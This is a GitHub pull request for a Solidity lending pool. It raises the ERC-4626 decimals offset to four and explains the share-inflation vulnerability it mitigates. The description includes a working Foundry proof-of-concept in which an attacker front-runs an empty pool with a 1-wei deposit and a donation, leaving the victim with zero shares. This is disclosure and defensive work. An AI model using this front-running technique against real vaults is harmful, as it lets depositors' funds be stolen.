### PR TITLE
fix: update default decimal offset

### DIFF
--- a/tests/utils/Defaults.sol
+++ b/tests/utils/Defaults.sol
@@ -23,7 +23,7 @@ contract Defaults is Constants {
     uint256 public constant POOL_ASSETS = 1_500_000e6; // note: must be larger than POOL_SHARES, see initializePool()
 
     uint8 public constant UNDERLYING_DECIMALS = 6;
-    uint8 public constant DECIMALS_OFFSET = 0;
+    uint8 public constant DECIMALS_OFFSET = 4;
     uint256 public immutable DEADLINE; // for erc20 permit
 
     uint256 public constant DEPOSIT_AMOUNT = 1000e6;


### PR DESCRIPTION
# Summary
The pool contract, based on the ERC-4626 vault architecture, has potential front-running and inflation attack risks. The previous [PR](https://github.com/isle-labs/isle-contract/pull/53) addressed this issue; however, it caused a test to fail and this PR resolves the failing test case.

# Introduction
The pool contract employs an ERC-4626 vault architecture, which is vulnerable to specific issues, such as exchange rate manipulation and inflation risks highlighted here:

1. [Exchange Rate Manipulation in ERC4626 Vaults](https://www.euler.finance/blog/exchange-rate-manipulation-in-erc4626-vaults)
2. ERC-4626 Inflation Issue

Our `Pool::deposit` function faces a similar inflation issue, using the formula below to calculate shares:

``` 
shares_ = assets_.mulDiv(totalSupply() + 10 ** _decimalsOffset(), totalAssets() + 1, rounding_);
```

Here, `totalSupply` represents the share token amount, `_decimalsOffset` returns a constant (0 in this case), and `totalAssets` combines the pool asset amount with assets under management.

The vulnerability manifests when creating a new pool without any loan requests or funding activity, that is, an empty pool. If a lender attempts to deposit assets using `Pool::deposit` or `Pool::depositWithPermit`, an attacker can front-run the transaction by depositing a minimal amount (1 wei) and subsequently donate twice the lender’s deposit amount. This results in the lender receiving no shares while the attacker withdraws all assets, including those deposited by the lender.

For validation, please place the proof-of-concept test at `isle-contract/tests/integration/concrete/pool/deposit/poc.t.sol` and execute `forge test --mc POC`. If the fuzzing test passes, it confirms the presence of the inflation issue. Remember to set `_decimalOffset` to zero to reproduce the ERC-4626 inflation problem accurately.
```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";

import { Errors } from "contracts/libraries/Errors.sol";

import { Deposit_Integration_Shared_Test } from "../../../shared/pool/deposit.t.sol";
import { Pool_Integration_Shared_Test } from "../../../shared/pool/Pool.t.sol";

import { console } from "@forge-std/console.sol";

contract POC is Pool_Integration_Shared_Test, Deposit_Integration_Shared_Test {
    address internal victim;
    address internal hacker;

    function setUp() public virtual override(Pool_Integration_Shared_Test, Deposit_Integration_Shared_Test) {
        victim = makeAddr("victim");
        hacker = makeAddr("hacker");

        Pool_Integration_Shared_Test.setUp();
        Deposit_Integration_Shared_Test.setUp();
    }

    function testPoC(uint256 x) external {
        vm.assume(x < 100 ether);

        deal({ token: address(usdc), to: hacker, give: 1e27 });
        deal({ token: address(usdc), to: victim, give: 1e27 });

        uint256 share;

        // The hacker front-run the deposit transaction
        changePrank(hacker);
        usdc.approve(address(pool), type(uint256).max);
        share = pool.deposit({ assets: 1 wei, receiver: hacker });
        // The hacker donate twice the amount the lender deposits
        usdc.transfer(address(pool), x*2);

        // The lender deposits
        changePrank(victim);
        usdc.approve(address(pool), type(uint256).max);
        share = pool.deposit(x, victim);

        // The lender will always get 0 share
        assertTrue(share == 0);
    }
}
```
After examining the pool structure of Maple Finance and reviewing OpenZeppelin's implementation details, we have adjusted the _decimalOffset from zero to four to incorporate virtual liquidity, thereby increasing the attack cost by over a thousand times.

# Verification

Make sure all the test pass in the pipeline
